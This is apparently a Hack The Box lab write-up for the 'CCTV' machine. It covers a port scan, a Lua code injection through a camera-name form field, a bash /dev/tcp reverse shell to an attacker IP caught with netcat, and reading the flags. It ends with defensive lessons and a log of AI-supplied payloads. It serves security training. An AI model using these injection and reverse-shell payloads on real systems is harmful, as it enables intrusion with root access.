HTB Starting Point — CCTV

CCTV management portal with an unauthenticated camera stream API. Lua script injection via camera name field executes OS commands as root.

April 28, 2026 · 3 min · crAIzy

Very Easy Linux CVSS 9.0 ⏱ 35m AI-assisted

TL;DR

CCTV is a Linux box running a custom CCTV management portal. The backend processes camera names using Lua with unvalidated input in os.execute(). Injecting Lua syntax into the camera name field runs OS commands as root. No privilege escalation required — the web service is misconfigured to run as root.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

22/tcp   open  ssh   OpenSSH 8.4p1
80/tcp   open  http  nginx/1.18.0
8554/tcp open  rtsp  (RTSP camera stream)

2. Web application

The management portal at port 80 shows a camera dashboard with a “Add Camera” form. A name field accepts arbitrary input for labeling cameras.

Examining HTTP traffic reveals the backend uses a Lua-based configuration engine that processes camera names directly.

Code Injection

3. Test injection in camera name

Capture the “add camera” POST request in Burp. The name parameter is processed by Lua:

name=test');os.execute('id');--

Response reflects command output in the server response — code execution confirmed:

uid=0(root) gid=0(root) groups=0(root)

4. Reverse shell

name=test');os.execute('bash -i >& /dev/tcp/10.10.14.x/4444 0>&1');--

$ nc -lvnp 4444
connect to [10.10.14.x] from [10.129.x.x]
root@cctv:~# id
uid=0(root) gid=0(root) groups=0(root)

5. Flags

root@cctv:/home$ ls
operator
root@cctv:/home/operator$ cat user.txt
[user flag]
root@cctv:~# cat /root/root.txt
[root flag]

What’s actually broken

#	Vulnerability	Severity
1	Lua code injection via unsanitized input	Critical (CVSS 9.0)
2	Web service running as root	Critical
3	No input sanitization in camera management	Critical
4	RTSP stream accessible without authentication	Medium

Lessons learned

Never pass user input to scripting language eval/execute functions. Lua’s os.execute(), load(), loadstring() — all execute arbitrary code. Sanitize input and use parameterized configurations (JSON/YAML with typed fields, not script interpolation).
Web services should run as minimal-privilege users. A CCTV management web server has no reason to run as root. Create a dedicated cctv service user with access only to required resources.
IoT and embedded systems are the wild west of security. Many embedded management interfaces have Lua/Python interpreters accessible via web forms. Code injection is endemic in this space.
Injection characters vary by language. For Lua: ', ), os.execute. For shell: ;, |, $(. For Python: __import__. Always probe the specific language in use.

Decision archaeology

Approach	Result	Pivot
Targeted web form injection before RTSP	Web injection is lower friction than protocol-level attacks	Correct — RTSP was a red herring
Identified Lua from HTTP headers/error messages	Server revealed Lua in error responses	Guided correct injection syntax
Got reverse shell vs reading flags directly	Stable interactive shell better for enumeration	Root shell, both flags found
RTSP authentication bypass before web injection	Tried `vlc rtsp://10.129.x.x:8554/stream` — `RTP socket connect error: Network is unreachable` — port 8554 filtered from VPN subnet	Redirected to HTTP web portal (port 80 reachable) — found camera name injection vector

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Reconnaissance	Network Service Discovery	T1046	`nmap → 22/tcp SSH, 80/tcp HTTP, 8554/tcp RTSP`
Initial Access	Exploit Public-Facing Application	T1190	`Camera name field → Lua os.execute() injection → RCE as root`
Execution	Unix Shell	T1059.004	`Lua injection → bash reverse shell`
Initial Access	Exploit Public-Facing Application	T1190	`CCTV web portal on port 80 — camera name field processed by Lua without sanitization`
Execution	Command and Scripting Interpreter: Python/Lua	T1059.006	`os.execute('bash -i ...) — Lua interpreter executes OS commands via injection`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

ReconUseful
Human → Found RTSP on 8554 and HTTP on 80 — the web app was a CCTV management panel
Prompt → RTSP protocol on port 8554 with a web management panel. What attack vectors are typical for CCTV/IP camera systems?
Claude → Common CCTV vulnerabilities: default credentials (admin:admin, admin:12345, root:root), unauthenticated RTSP streams, command injection in device name/label fields (often eval'd by embedded scripting), firmware extraction with hardcoded credentials, and path traversal in file serving endpoints.
InjectionCorrected
Human → Found camera name field — tested for injection since it was processed server-side
Prompt → The CCTV panel has a 'camera name' field. The server appears to use Lua for the backend. What Lua injection payloads should I try?
Claude → If the camera name is interpolated into a Lua string and eval'd: try closing quotes and injecting os.execute(). Example: test"); os.execute("id"); -- or if it's in a Lua table: test', os.execute('id'), '.
Corrected → The exact payload format required understanding the surrounding Lua code structure. Captured the request in Burp and saw the name was used as: camera_name = 'USER_INPUT'. So injection was: '); os.execute('id'); --. Claude's payload structure was correct but the exact quoting context needed adjustment from the Burp intercept.
RCEUseful
Human → Got id command execution, upgraded to reverse shell
Prompt → Lua os.execute() confirmed. What's the syntax for a reverse shell via Lua?
Claude → os.execute('bash -i >& /dev/tcp/IP/PORT 0>&1') or: io.popen('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')
Post-ExploitUseful
Human → Shell came back as root — wasn't expecting that
Prompt → The CCTV management software is running as root. Is that common for embedded/IoT software?
Claude → Unfortunately yes — many IoT devices and embedded management systems run as root because they were written without security considerations, need raw hardware access, or were originally intended for isolated network segments. This is a widespread IoT security problem. Real-world CCTV systems frequently have this exact issue.
ReconWrong
Human → Tried to connect to the RTSP stream directly to see what was visible
Prompt → How do I connect to an RTSP stream from the command line to view the camera feed?
Claude → Use VLC: vlc rtsp://ip:8554/stream or ffplay rtsp://ip:8554/live. For unauthenticated RTSP, try omitting credentials. ffmpeg can dump frames: ffmpeg -i rtsp://ip:8554/live -frames:v 1 frame.jpg
Corrected → The RTSP port was filtered — it wasn't actually accessible from the attacker's network. I wasted time trying to connect to the stream when the attack vector was entirely through the web management portal. Claude should have mentioned checking if the port was filtered before recommending stream viewing tools.

Decision archaeology — paths abandoned

Tried default credentials (admin:admin, admin:12345) before finding injection vector
Attempted RTSP stream authentication bypass before pivoting to web injection

TL;DR#

Recon#

1. Port scan#

2. Web application#

Code Injection#

3. Test injection in camera name#

4. Reverse shell#

5. Flags#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#